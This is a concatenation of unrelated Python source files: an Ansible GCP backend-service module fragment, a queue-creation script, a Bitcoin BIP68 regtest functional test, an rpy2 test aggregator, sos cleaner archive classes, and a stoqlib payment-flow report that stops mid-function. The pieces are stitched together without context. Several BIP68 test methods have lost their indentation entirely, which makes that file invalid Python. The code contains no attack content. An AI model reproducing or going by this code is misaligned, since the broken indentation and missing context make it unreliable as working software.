        u'timeoutSec': params.get('timeout_sec'),
    }
    # Keep explicit False but drop None / empty values.
    return {key: value for key, value in request.items() if value or value is False}
def fetch_resource(module, link, kind, allow_not_found=True):
    """GET *link* and return the decoded resource, or None when absent."""
    session = GcpSession(module, 'compute')
    return return_if_object(module, session.get(link), kind, allow_not_found)
def self_link(module):
    """Return the canonical URL of the backend service named in the params."""
    return (
        "https://www.googleapis.com/compute/v1/projects/%(project)s/global/backendServices/%(name)s"
        % {'project': module.params['project'], 'name': module.params['name']}
    )
def collection(module):
    """Return the list/create URL for backend services in this project."""
    return "https://www.googleapis.com/compute/v1/projects/%(project)s/global/backendServices" % {
        'project': module.params['project'],
    }
def return_if_object(module, response, kind, allow_not_found=False):
    """Decode *response* into a dict, or return None for 404/204 responses.

    Fails the module run on a non-JSON body or when the decoded payload
    carries a GCP error list.
    """
    # Nothing to decode: resource absent (when tolerated) or empty body.
    if allow_not_found and response.status_code == 404:
        return None
    if response.status_code == 204:
        return None
    try:
        module.raise_for_status(response)
        result = response.json()
    except getattr(json.decoder, 'JSONDecodeError', ValueError):
        module.fail_json(msg="Invalid JSON response with error: %s" % response.text)
    errors = navigate_hash(result, ['error', 'errors'])
    if errors:
        module.fail_json(msg=errors)
    return result
def is_different(module, response):
    """Return True when the live resource differs from the desired request.

    Only keys present on both sides take part in the comparison; everything
    else is output-only (or unset) and must not trigger a spurious update.
    """
    request = resource_to_request(module)
    response = response_to_hash(module, response)
    response_vals = {k: v for k, v in response.items() if k in request}
    request_vals = {k: v for k, v in request.items() if k in response}
    return GcpRequest(request_vals) != GcpRequest(response_vals)
def response_to_hash(module, response):
    """Normalise an API response into the dict shape used by is_different().

    NOTE(review): 'loadBalancingScheme' and 'name' are taken from the module
    params rather than the response — presumably because the generator treats
    them as immutable identity fields; confirm against the code generator.
    """
    scalar_keys = (
        u'affinityCookieTtlSec',
        u'creationTimestamp',
        u'fingerprint',
        u'description',
        u'enableCDN',
        u'healthChecks',
        u'id',
        u'portName',
        u'protocol',
        u'securityPolicy',
        u'sessionAffinity',
        u'timeoutSec',
    )
    result = {key: response.get(key) for key in scalar_keys}
    # Nested sub-objects go through the same serialiser classes as requests.
    result[u'backends'] = BackendServiceBackendsArray(response.get(u'backends', []), module).from_response()
    result[u'cdnPolicy'] = BackendServiceCdnpolicy(response.get(u'cdnPolicy', {}), module).from_response()
    result[u'connectionDraining'] = BackendServiceConnectiondraining(response.get(u'connectionDraining', {}), module).from_response()
    result[u'iap'] = BackendServiceIap(response.get(u'iap', {}), module).from_response()
    result[u'loadBalancingScheme'] = module.params.get('load_balancing_scheme')
    result[u'name'] = module.params.get('name')
    return result
def async_op_url(module, extra_data=None):
    """Build the URL of a global compute operation.

    *extra_data* typically supplies ``op_id``; module params (project, …)
    take precedence over it when keys collide.
    """
    combined = dict(extra_data or {})
    combined.update(module.params)
    template = "https://www.googleapis.com/compute/v1/projects/{project}/global/operations/{op_id}"
    return template.format(**combined)
def wait_for_operation(module, response):
    """Block until the operation in *response* is DONE, then fetch its target."""
    op_result = return_if_object(module, response, 'compute#operation')
    if op_result is None:
        return {}
    initial_status = navigate_hash(op_result, ['status'])
    finished = wait_for_completion(initial_status, op_result, module)
    return fetch_resource(module, navigate_hash(finished, ['targetLink']), 'compute#backendService')
def wait_for_completion(status, op_result, module):
    """Poll the operation once a second until its status reaches DONE.

    Fails the module run as soon as the operation reports errors.
    """
    op_uri = async_op_url(module, {'op_id': navigate_hash(op_result, ['name'])})
    while status != 'DONE':
        raise_if_errors(op_result, ['error', 'errors'], module)
        time.sleep(1.0)
        op_result = fetch_resource(module, op_uri, 'compute#operation', False)
        status = navigate_hash(op_result, ['status'])
    return op_result
def raise_if_errors(response, err_path, module):
    """Fail the module run when *response* carries errors at *err_path*."""
    found = navigate_hash(response, err_path)
    if found is None:
        return
    module.fail_json(msg=found)
class BackendServiceBackendsArray(object):
    """Serialise the `backends` list between module (snake_case) and API (camelCase) form."""

    # (snake_case module key, camelCase API key) for every backend field.
    _KEYS = (
        ('balancing_mode', u'balancingMode'),
        ('capacity_scaler', u'capacityScaler'),
        ('description', u'description'),
        ('group', u'group'),
        ('max_connections', u'maxConnections'),
        ('max_connections_per_instance', u'maxConnectionsPerInstance'),
        ('max_connections_per_endpoint', u'maxConnectionsPerEndpoint'),
        ('max_rate', u'maxRate'),
        ('max_rate_per_instance', u'maxRatePerInstance'),
        ('max_rate_per_endpoint', u'maxRatePerEndpoint'),
        ('max_utilization', u'maxUtilization'),
    )

    def __init__(self, request, module):
        self.module = module
        self.request = request if request else []

    def to_request(self):
        """Module param items -> API request items."""
        return [self._request_for_item(item) for item in self.request]

    def from_response(self):
        """API response items -> comparison items."""
        return [self._response_from_item(item) for item in self.request]

    def _request_for_item(self, item):
        # Translate snake_case keys to camelCase and drop unset fields.
        return remove_nones_from_dict({api: item.get(snake) for snake, api in self._KEYS})

    def _response_from_item(self, item):
        # Response items already use camelCase; just drop unset fields.
        return remove_nones_from_dict({api: item.get(api) for _snake, api in self._KEYS})
class BackendServiceCdnpolicy(object):
    """Serialise the `cdn_policy` sub-object in both directions."""

    def __init__(self, request, module):
        self.module = module
        self.request = request if request else {}

    def to_request(self):
        """Module params -> API request form."""
        cache_policy = BackendServiceCachekeypolicy(self.request.get('cache_key_policy', {}), self.module)
        return remove_nones_from_dict({
            u'cacheKeyPolicy': cache_policy.to_request(),
            u'signedUrlCacheMaxAgeSec': self.request.get('signed_url_cache_max_age_sec'),
        })

    def from_response(self):
        """API response -> comparison form."""
        cache_policy = BackendServiceCachekeypolicy(self.request.get(u'cacheKeyPolicy', {}), self.module)
        return remove_nones_from_dict({
            u'cacheKeyPolicy': cache_policy.from_response(),
            u'signedUrlCacheMaxAgeSec': self.request.get(u'signedUrlCacheMaxAgeSec'),
        })
class BackendServiceCachekeypolicy(object):
    """Serialise `cdn_policy.cache_key_policy` in both directions."""

    # (snake_case module key, camelCase API key) for each cache-key field.
    _KEYS = (
        ('include_host', u'includeHost'),
        ('include_protocol', u'includeProtocol'),
        ('include_query_string', u'includeQueryString'),
        ('query_string_blacklist', u'queryStringBlacklist'),
        ('query_string_whitelist', u'queryStringWhitelist'),
    )

    def __init__(self, request, module):
        self.module = module
        self.request = request if request else {}

    def to_request(self):
        """Module params -> API request form."""
        return remove_nones_from_dict({api: self.request.get(snake) for snake, api in self._KEYS})

    def from_response(self):
        """API response -> comparison form."""
        return remove_nones_from_dict({api: self.request.get(api) for _snake, api in self._KEYS})
class BackendServiceConnectiondraining(object):
    """Serialise the `connection_draining` sub-object in both directions."""

    def __init__(self, request, module):
        self.module = module
        self.request = request if request else {}

    def to_request(self):
        """Module params -> API request form."""
        return remove_nones_from_dict({u'drainingTimeoutSec': self.request.get('draining_timeout_sec')})

    def from_response(self):
        """API response -> comparison form."""
        return remove_nones_from_dict({u'drainingTimeoutSec': self.request.get(u'drainingTimeoutSec')})
class BackendServiceIap(object):
    """Serialise the `iap` (Identity-Aware Proxy) sub-object in both directions."""

    # (snake_case module key, camelCase API key); the output-only
    # oauth2ClientSecretSha256 field is deliberately excluded.
    _KEYS = (
        ('enabled', u'enabled'),
        ('oauth2_client_id', u'oauth2ClientId'),
        ('oauth2_client_secret', u'oauth2ClientSecret'),
    )

    def __init__(self, request, module):
        self.module = module
        self.request = request if request else {}

    def to_request(self):
        """Module params -> API request form."""
        return remove_nones_from_dict({api: self.request.get(snake) for snake, api in self._KEYS})

    def from_response(self):
        """API response -> comparison form."""
        return remove_nones_from_dict({api: self.request.get(api) for _snake, api in self._KEYS})
# Entry point when Ansible executes this module directly.
if __name__ == '__main__':
    main()
|
import os
from watermark.config import config as conf
from watermark import connect

# Pick the active configuration from the environment, defaulting to 'default'.
config_name = os.getenv('WM_CONFIG_ENV') or 'default'
config = conf[config_name]()

# Open a connection and create the message queue named by the configuration.
connection = connect.get_connection(config)
connection.message.create_queue(name=config.NAME)
print("{name} queue created".format(name=config.NAME))
|
"""Test BIP68 implementation."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.blocktools import *
# Bit 31 of nSequence: when set, the relative lock-time is disabled for that input.
SEQUENCE_LOCKTIME_DISABLE_FLAG = (1<<31)
SEQUENCE_LOCKTIME_TYPE_FLAG = (1<<22) # this means use time (0 means height)
SEQUENCE_LOCKTIME_GRANULARITY = 9 # this is a bit-shift
# Low 16 bits of nSequence carry the lock value itself (blocks or time units).
SEQUENCE_LOCKTIME_MASK = 0x0000ffff
# Reject-reason expected from the node for a BIP68-violating transaction.
NOT_FINAL_ERROR = "non-BIP68-final (code 64)"
class BIP68Test(BitcoinTestFramework):
    def set_test_params(self):
        """Two nodes: node0 with defaults, node1 rejecting non-standard txs."""
        self.num_nodes = 2
        self.extra_args = [[], ["-acceptnonstdtxn=0"]]
    def run_test(self):
        """Run the BIP68 sub-tests in an order that keeps CSV inactive until
        test_bip68_not_consensus() has executed, then activate CSV."""
        self.relayfee = self.nodes[0].getnetworkinfo()["relayfee"]
        # Generate some coins
        self.nodes[0].generate(110)
        self.log.info("Running test disable flag")
        self.test_disable_flag()
        self.log.info("Running test sequence-lock-confirmed-inputs")
        self.test_sequence_lock_confirmed_inputs()
        self.log.info("Running test sequence-lock-unconfirmed-inputs")
        self.test_sequence_lock_unconfirmed_inputs()
        self.log.info("Running test BIP68 not consensus before versionbits activation")
        self.test_bip68_not_consensus()
        self.log.info("Activating BIP68 (and 112/113)")
        self.activateCSV()
        self.log.info("Verifying nVersion=2 transactions are standard.")
        self.log.info("Note that nVersion=2 transactions are always standard (independent of BIP68 activation status).")
        self.test_version2_relay()
        self.log.info("Passed")
# Test that BIP68 is not in effect if tx version is 1, or if
# the first sequence bit is set.
    def test_disable_flag(self):
        """Verify BIP68 is inert for nVersion=1 txs and for inputs whose
        nSequence carries the disable bit (bit 31)."""
        # Create some unconfirmed inputs
        new_addr = self.nodes[0].getnewaddress()
        self.nodes[0].sendtoaddress(new_addr, 2) # send 2 BTC
        utxos = self.nodes[0].listunspent(0, 0)
        assert(len(utxos) > 0)
        utxo = utxos[0]
        tx1 = CTransaction()
        value = int(satoshi_round(utxo["amount"] - self.relayfee)*COIN)
        # Check that the disable flag disables relative locktime.
        # If sequence locks were used, this would require 1 block for the
        # input to mature.
        sequence_value = SEQUENCE_LOCKTIME_DISABLE_FLAG | 1
        tx1.vin = [CTxIn(COutPoint(int(utxo["txid"], 16), utxo["vout"]), nSequence=sequence_value)]
        tx1.vout = [CTxOut(value, CScript([b'a']))]
        tx1_signed = self.nodes[0].signrawtransactionwithwallet(ToHex(tx1))["hex"]
        tx1_id = self.nodes[0].sendrawtransaction(tx1_signed)
        tx1_id = int(tx1_id, 16)
        # This transaction will enable sequence-locks, so this transaction should
        # fail
        tx2 = CTransaction()
        tx2.nVersion = 2
        # Clear the disable bit, keeping the 1-block relative lock.
        sequence_value = sequence_value & 0x7fffffff
        tx2.vin = [CTxIn(COutPoint(tx1_id, 0), nSequence=sequence_value)]
        tx2.vout = [CTxOut(int(value-self.relayfee*COIN), CScript([b'a']))]
        tx2.rehash()
        assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, ToHex(tx2))
        # Setting the version back down to 1 should disable the sequence lock,
        # so this should be accepted.
        tx2.nVersion = 1
        self.nodes[0].sendrawtransaction(ToHex(tx2))
# Calculate the median time past of a prior block ("confirmations" before
# the current tip).
def get_median_time_past(self, confirmations):
block_hash = self.nodes[0].getblockhash(self.nodes[0].getblockcount()-confirmations)
return self.nodes[0].getblockheader(block_hash)["mediantime"]
# Test that sequence locks are respected for transactions spending confirmed inputs.
def test_sequence_lock_confirmed_inputs(self):
# Create lots of confirmed utxos, and use them to generate lots of random
# transactions.
max_outputs = 50
addresses = []
while len(addresses) < max_outputs:
addresses.append(self.nodes[0].getnewaddress())
while len(self.nodes[0].listunspent()) < 200:
import random
random.shuffle(addresses)
num_outputs = random.randint(1, max_outputs)
outputs = {}
for i in range(num_outputs):
outputs[addresses[i]] = random.randint(1, 20)*0.01
self.nodes[0].sendmany("", outputs)
self.nodes[0].generate(1)
utxos = self.nodes[0].listunspent()
# Try creating a lot of random transactions.
# Each time, choose a random number of inputs, and randomly set
# some of those inputs to be sequence locked (and randomly choose
# between height/time locking). Small random chance of making the locks
# all pass.
for i in range(400):
# Randomly choose up to 10 inputs
num_inputs = random.randint(1, 10)
random.shuffle(utxos)
# Track whether any sequence locks used should fail
should_pass = True
# Track whether this transaction was built with sequence locks
using_sequence_locks = False
tx = CTransaction()
tx.nVersion = 2
value = 0
for j in range(num_inputs):
sequence_value = 0xfffffffe # this disables sequence locks
# 50% chance we enable sequence locks
if random.randint(0,1):
using_sequence_locks = True
# 10% of the time, make the input sequence value pass
input_will_pass = (random.randint(1,10) == 1)
sequence_value = utxos[j]["confirmations"]
if not input_will_pass:
sequence_value += 1
should_pass = False
# Figure out what the median-time-past was for the confirmed input
# Note that if an input has N confirmations, we're going back N blocks
# from the tip so that we're looking up MTP of the block
# PRIOR to the one the input appears in, as per the BIP68 spec.
orig_time = self.get_median_time_past(utxos[j]["confirmations"])
cur_time = self.get_median_time_past(0) # MTP of the tip
# can only timelock this input if it's not too old -- otherwise use height
can_time_lock = True
if ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY) >= SEQUENCE_LOCKTIME_MASK:
can_time_lock = False
# if time-lockable, then 50% chance we make this a time lock
if random.randint(0,1) and can_time_lock:
# Find first time-lock value that fails, or latest one that succeeds
time_delta = sequence_value << SEQUENCE_LOCKTIME_GRANULARITY
if input_will_pass and time_delta > cur_time - orig_time:
sequence_value = ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY)
elif (not input_will_pass and time_delta <= cur_time - orig_time):
sequence_value = ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY)+1
sequence_value |= SEQUENCE_LOCKTIME_TYPE_FLAG
tx.vin.append(CTxIn(COutPoint(int(utxos[j]["txid"], 16), utxos[j]["vout"]), nSequence=sequence_value))
value += utxos[j]["amount"]*COIN
# Overestimate the size of the tx - signatures should be less than 120 bytes, and leave 50 for the output
tx_size = len(ToHex(tx))//2 + 120*num_inputs + 50
tx.vout.append(CTxOut(int(value-self.relayfee*tx_size*COIN/1000), CScript([b'a'])))
rawtx = self.nodes[0].signrawtransactionwithwallet(ToHex(tx))["hex"]
if (using_sequence_locks and not should_pass):
# This transaction should be rejected
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, rawtx)
else:
# This raw transaction should be accepted
self.nodes[0].sendrawtransaction(rawtx)
utxos = self.nodes[0].listunspent()
# Test that sequence locks on unconfirmed inputs must have nSequence
# height or time of 0 to be accepted.
# Then test that BIP68-invalid transactions are removed from the mempool
# after a reorg.
    def test_sequence_lock_unconfirmed_inputs(self):
        """Check that spends of unconfirmed inputs require an nSequence lock
        of 0, and that BIP68-invalid transactions are evicted from the
        mempool after a reorg."""
        # Store height so we can easily reset the chain at the end of the test
        cur_height = self.nodes[0].getblockcount()
        # Create a mempool tx.
        txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 2)
        tx1 = FromHex(CTransaction(), self.nodes[0].getrawtransaction(txid))
        tx1.rehash()
        # Anyone-can-spend mempool tx.
        # Sequence lock of 0 should pass.
        tx2 = CTransaction()
        tx2.nVersion = 2
        tx2.vin = [CTxIn(COutPoint(tx1.sha256, 0), nSequence=0)]
        tx2.vout = [CTxOut(int(tx1.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
        tx2_raw = self.nodes[0].signrawtransactionwithwallet(ToHex(tx2))["hex"]
        tx2 = FromHex(tx2, tx2_raw)
        tx2.rehash()
        self.nodes[0].sendrawtransaction(tx2_raw)
        # Create a spend of the 0th output of orig_tx with a sequence lock
        # of 1, and test what happens when submitting.
        # orig_tx.vout[0] must be an anyone-can-spend output
        def test_nonzero_locks(orig_tx, node, relayfee, use_height_lock):
            sequence_value = 1
            if not use_height_lock:
                sequence_value |= SEQUENCE_LOCKTIME_TYPE_FLAG
            tx = CTransaction()
            tx.nVersion = 2
            tx.vin = [CTxIn(COutPoint(orig_tx.sha256, 0), nSequence=sequence_value)]
            tx.vout = [CTxOut(int(orig_tx.vout[0].nValue - relayfee*COIN), CScript([b'a']))]
            tx.rehash()
            if (orig_tx.hash in node.getrawmempool()):
                # sendrawtransaction should fail if the tx is in the mempool
                assert_raises_rpc_error(-26, NOT_FINAL_ERROR, node.sendrawtransaction, ToHex(tx))
            else:
                # sendrawtransaction should succeed if the tx is not in the mempool
                node.sendrawtransaction(ToHex(tx))
            return tx
        test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=True)
        test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
        # Now mine some blocks, but make sure tx2 doesn't get mined.
        # Use prioritisetransaction to lower the effective feerate to 0
        self.nodes[0].prioritisetransaction(tx2.hash, int(-self.relayfee*COIN))
        cur_time = self.mocktime
        for i in range(10):
            self.nodes[0].setmocktime(cur_time + 600)
            self.nodes[0].generate(1)
            cur_time += 600
        # tx2 must still be unconfirmed for the next lock checks to apply.
        assert(tx2.hash in self.nodes[0].getrawmempool())
        test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=True)
        test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
        # Mine tx2, and then try again
        self.nodes[0].prioritisetransaction(tx2.hash, int(self.relayfee*COIN))
        # Advance the time on the node so that we can test timelocks
        self.nodes[0].setmocktime(cur_time+600)
        self.nodes[0].generate(1)
        assert(tx2.hash not in self.nodes[0].getrawmempool())
        # Now that tx2 is not in the mempool, a sequence locked spend should
        # succeed
        tx3 = test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
        assert(tx3.hash in self.nodes[0].getrawmempool())
        self.nodes[0].generate(1)
        assert(tx3.hash not in self.nodes[0].getrawmempool())
        # One more test, this time using height locks
        tx4 = test_nonzero_locks(tx3, self.nodes[0], self.relayfee, use_height_lock=True)
        assert(tx4.hash in self.nodes[0].getrawmempool())
        # Now try combining confirmed and unconfirmed inputs
        tx5 = test_nonzero_locks(tx4, self.nodes[0], self.relayfee, use_height_lock=True)
        assert(tx5.hash not in self.nodes[0].getrawmempool())
        utxos = self.nodes[0].listunspent()
        tx5.vin.append(CTxIn(COutPoint(int(utxos[0]["txid"], 16), utxos[0]["vout"]), nSequence=1))
        tx5.vout[0].nValue += int(utxos[0]["amount"]*COIN)
        raw_tx5 = self.nodes[0].signrawtransactionwithwallet(ToHex(tx5))["hex"]
        assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, raw_tx5)
        # Test mempool-BIP68 consistency after reorg
        #
        # State of the transactions in the last blocks:
        # ... -> [ tx2 ] -> [ tx3 ]
        # tip-1 tip
        # And currently tx4 is in the mempool.
        #
        # If we invalidate the tip, tx3 should get added to the mempool, causing
        # tx4 to be removed (fails sequence-lock).
        self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
        assert(tx4.hash not in self.nodes[0].getrawmempool())
        assert(tx3.hash in self.nodes[0].getrawmempool())
        # Now mine 2 empty blocks to reorg out the current tip (labeled tip-1 in
        # diagram above).
        # This would cause tx2 to be added back to the mempool, which in turn causes
        # tx3 to be removed.
        tip = int(self.nodes[0].getblockhash(self.nodes[0].getblockcount()-1), 16)
        height = self.nodes[0].getblockcount()
        for i in range(2):
            block = create_block(tip, create_coinbase(height), cur_time)
            block.nVersion = 3
            block.rehash()
            block.solve()
            tip = block.sha256
            height += 1
            self.nodes[0].submitblock(ToHex(block))
            cur_time += 1
        mempool = self.nodes[0].getrawmempool()
        assert(tx3.hash not in mempool)
        assert(tx2.hash in mempool)
        # Reset the chain and get rid of the mocktimed-blocks
        self.nodes[0].setmocktime(self.mocktime)
        self.nodes[0].invalidateblock(self.nodes[0].getblockhash(cur_height+1))
        self.nodes[0].generate(10)
# Make sure that BIP68 isn't being used to validate blocks, prior to
# versionbits activation. If more blocks are mined prior to this test
# being run, then it's possible the test has activated the soft fork, and
# this test should be moved to run earlier, or deleted.
    def test_bip68_not_consensus(self):
        """Check that BIP68 sequence locks are enforced as mempool policy only,
        not as consensus, while the CSV deployment is not yet active.

        Builds tx1 -> tx2 -> tx3 where tx3 violates its relative lock-time:
        tx3 must be rejected by the mempool but accepted inside a block.
        """
        # Guard: this test is only meaningful before CSV activation.
        assert(get_bip9_status(self.nodes[0], 'csv')['status'] != 'active')
        txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 2)
        tx1 = FromHex(CTransaction(), self.nodes[0].getrawtransaction(txid))
        tx1.rehash()

        # Make an anyone-can-spend transaction
        tx2 = CTransaction()
        tx2.nVersion = 1  # version-1 transactions are exempt from BIP68
        tx2.vin = [CTxIn(COutPoint(tx1.sha256, 0), nSequence=0)]
        tx2.vout = [CTxOut(int(tx1.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]

        # sign tx2
        tx2_raw = self.nodes[0].signrawtransactionwithwallet(ToHex(tx2))["hex"]
        tx2 = FromHex(tx2, tx2_raw)
        tx2.rehash()
        self.nodes[0].sendrawtransaction(ToHex(tx2))

        # Now make an invalid spend of tx2 according to BIP68
        sequence_value = 100  # 100 block relative locktime
        tx3 = CTransaction()
        tx3.nVersion = 2  # version >= 2 opts in to BIP68 semantics
        tx3.vin = [CTxIn(COutPoint(tx2.sha256, 0), nSequence=sequence_value)]
        tx3.vout = [CTxOut(int(tx2.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
        tx3.rehash()

        # Mempool policy does enforce the lock, so relay must fail ...
        assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, ToHex(tx3))

        # ... but consensus does not:
        # make a block that violates bip68; ensure that the tip updates
        tip = int(self.nodes[0].getbestblockhash(), 16)
        block = create_block(tip, create_coinbase(self.nodes[0].getblockcount()+1), self.mocktime + 600)
        block.nVersion = 3
        block.vtx.extend([tx1, tx2, tx3])
        block.hashMerkleRoot = block.calc_merkle_root()
        block.rehash()
        block.solve()

        self.nodes[0].submitblock(ToHex(block))
        assert_equal(self.nodes[0].getbestblockhash(), block.hash)
def activateCSV(self):
# activation should happen at block height 432 (3 periods)
# getblockchaininfo will show CSV as active at block 431 (144 * 3 -1) since it's returning whether CSV is active for the next block.
min_activation_height = 432
height = self.nodes[0].getblockcount()
assert_greater_than(min_activation_height - height, 2)
self.nodes[0].generate(min_activation_height - height - 2)
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], "locked_in")
self.nodes[0].generate(1)
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], "active")
self.sync_blocks()
# Use self.nodes[1] to test that version 2 transactions are standard.
def test_version2_relay(self):
inputs = [ ]
outputs = { self.nodes[1].getnewaddress() : 1.0 }
rawtx = self.nodes[1].createrawtransaction(inputs, outputs)
rawtxfund = self.nodes[1].fundrawtransaction(rawtx)['hex']
tx = FromHex(CTransaction(), rawtxfund)
tx.nVersion = 2
tx_signed = self.nodes[1].signrawtransactionwithwallet(ToHex(tx))["hex"]
self.nodes[1].sendrawtransaction(tx_signed)
if __name__ == '__main__':
    # Run the BIP68 functional test directly from the command line.
    BIP68Test().main()
|
import unittest
import testRObject
import testVector
import testArray
import testDataFrame
import testFormula
import testFunction
import testEnvironment
import testRobjects
import testMethods
import testPackages
import testHelp
import testLanguage
import testNumpyConversions
def suite():
    """Build one top-level TestSuite aggregating every rpy2 test module."""
    # Modules listed in the order their suites are assembled.
    test_modules = (
        testRObject,
        testVector,
        testArray,
        testDataFrame,
        testFunction,
        testEnvironment,
        testFormula,
        testRobjects,
        testMethods,
        testNumpyConversions,
        testPackages,
        testHelp,
        testLanguage,
    )
    return unittest.TestSuite([mod.suite() for mod in test_modules])
def main():
    """Run the aggregated suite and return the populated TestResult."""
    result = unittest.TestResult()
    suite().run(result)
    return result
if __name__ == '__main__':
    # Use a distinct local name so the module-level suite() function is not
    # shadowed by its own result (the original rebound `suite` to a TestSuite).
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(suite())
|
from sos.cleaner.archives import SoSObfuscationArchive
import os
import tarfile
class DataDirArchive(SoSObfuscationArchive):
    """An obfuscation target that is simply a directory on the filesystem,
    rather than an archive produced by a known collection utility.
    """
    type_name = 'data_dir'
    description = 'unassociated directory'

    @classmethod
    def check_is_type(cls, arc_path):
        """A path is this type when it is an existing directory."""
        return os.path.isdir(arc_path)

    def set_archive_root(self):
        """The root is the directory itself, as an absolute path."""
        return os.path.abspath(self.archive_path)
class TarballArchive(SoSObfuscationArchive):
    """A plain tar archive that is not associated with any known or supported
    collection utility.
    """
    type_name = 'tarball'
    description = 'unassociated tarball'

    @classmethod
    def check_is_type(cls, arc_path):
        """A path is this type when tarfile recognizes it; any error while
        probing (missing file, permissions, short read) means "not a tarball".
        """
        try:
            is_tar = tarfile.is_tarfile(arc_path)
        except Exception:
            return False
        return is_tar

    def set_archive_root(self):
        """Top-level directory inside the tarball, or '' for a flat archive
        whose first member is not a directory."""
        first = self.tarobj.firstmember
        return first.name if first.isdir() else ''
|
"""Payment Flow History Report Dialog"""
from storm.expr import And, Eq, Or
from stoqlib.database.expr import Date
from stoqlib.gui.dialogs.daterangedialog import DateRangeDialog
from stoqlib.gui.utils.printing import print_report
from stoqlib.lib.message import info
from stoqlib.lib.translation import stoqlib_gettext
from stoqlib.reporting.payment import PaymentFlowHistoryReport
_ = stoqlib_gettext
# SQL producing one row per date that has any payment due or paid, with
# per-date counts and sums for: out-payments due (to_pay), out-payments
# paid, in-payments due (to_receive) and in-payments received. Rows come
# back ordered by date; PaymentFlowDay.get_flow_history relies on that
# ordering to chain daily balances and to stop early.
payment_flow_query = """
SELECT all_payment_dates.date,
COALESCE(payments_to_pay.count, 0) as to_pay_payments,
COALESCE(payments_to_pay.to_pay, 0) as to_pay,
COALESCE(payments_paid.count, 0) as paid_payments,
COALESCE(payments_paid.paid, 0) as paid,
COALESCE(payments_to_receive.count, 0) as to_receive_payments,
COALESCE(payments_to_receive.to_receive, 0) as to_receive,
COALESCE(payments_received.count, 0) as received_payments,
COALESCE(payments_received.received, 0) as received
FROM (SELECT date(due_date) as date FROM payment
UNION SELECT date(paid_date) as date FROM payment WHERE
paid_date IS NOT NULL) as all_payment_dates
-- To pay (out payments)
LEFT JOIN (SELECT DATE(due_date) as date, count(1) as count, sum(value) as to_pay
FROM payment WHERE payment_type = 'out' AND status not in ('preview', 'cancelled')
GROUP BY DATE(due_date))
AS payments_to_pay ON (all_payment_dates.date = payments_to_pay.date)
-- Paid (out payments)
LEFT JOIN (SELECT DATE(paid_date) as date, count(1) as count, sum(value) as paid
FROM payment WHERE payment_type = 'out'
AND payment.status not in ('preview', 'cancelled')
GROUP BY DATE(paid_date))
AS payments_paid ON (all_payment_dates.date = payments_paid.date)
-- To receive (in payments)
LEFT JOIN (SELECT DATE(due_date) as date, count(1) as count, sum(value) as to_receive
FROM payment WHERE payment_type = 'in'
AND payment.status not in ('preview', 'cancelled')
GROUP BY DATE(due_date))
AS payments_to_receive ON (all_payment_dates.date = payments_to_receive.date)
-- Received (in payments)
LEFT JOIN (SELECT DATE(paid_date) as date, count(1) as count, sum(value) as received
FROM payment WHERE payment_type = 'in'
AND payment.status not in ('preview', 'cancelled')
GROUP BY DATE(paid_date))
AS payments_received ON (all_payment_dates.date = payments_received.date)
ORDER BY all_payment_dates.date;
"""
class PaymentFlowDay(object):
    """Aggregated payment flow (in/out, expected/real) for a single date."""

    def __init__(self, store, row, previous_day=None):
        """Payment Flow History for a given date

        :param row: A list of values from the payment_flow_query above
        :param previous_day: The `previous_day <PaymentFlowDay>`. This is used
          to calculate the expected and real balances for each day (based on
          the previous dates).
        """
        # Column order must match the SELECT list of payment_flow_query.
        (date, to_pay_count, to_pay, paid_count, paid, to_receive_count,
         to_receive, received_count, received) = row

        self.history_date = date
        # values
        self.to_pay = to_pay
        self.to_receive = to_receive
        self.paid = paid
        self.received = received
        # counts
        self.to_pay_payments = to_pay_count
        self.to_receive_payments = to_receive_count
        self.paid_payments = paid_count
        self.received_payments = received_count

        # Balances chain day to day: each day opens with the previous day's
        # *real* closing balance (0 for the very first day).
        if previous_day:
            self.previous_balance = previous_day.balance_real
        else:
            self.previous_balance = 0

        # Today's balance is the previous day balance, plus the payments we
        # received, minus what we paid. expected if for the payments we should
        # have paid/received
        self.balance_expected = self.previous_balance + to_receive - to_pay
        self.balance_real = self.previous_balance + received - paid

        self.store = store

    def get_divergent_payments(self):
        """Returns a :class:`Payment` sequence that meet the following requirements:

        * The payment due date, paid date or cancel date is the current
          PaymentFlowHistory date.
        * The payment was paid/received with different values (eg with
          discount or surcharge).
        * The payment was scheduled to be paid/received on the current,
          but it was not.
        * The payment was not expected to be paid/received on the current date.
        """
        # Local import -- presumably avoids a circular import at module load
        # time; confirm against stoqlib.domain.payment.
        from stoqlib.domain.payment.payment import Payment
        date = self.history_date
        query = And(Or(Date(Payment.due_date) == date,
                       Date(Payment.paid_date) == date,
                       Date(Payment.cancel_date) == date),
                    Or(Eq(Payment.paid_value, None),
                       Payment.value != Payment.paid_value,
                       Eq(Payment.paid_date, None),
                       Date(Payment.due_date) != Date(Payment.paid_date)))
        return self.store.find(Payment, query)

    @classmethod
    def get_flow_history(cls, store, start, end):
        """Get the payment flow history for a given date interval

        This will return a list of PaymentFlowDay, one for each date that has
        payments registered and are in the interval specified.
        """
        history = []
        previous_entry = None

        # payment_flow_query returns rows ordered by date, so iteration can
        # stop at the first row past `end`.
        for row in store.execute(payment_flow_query).get_all():
            entry = cls(store, row, previous_entry)
            if entry.history_date > end:
                break

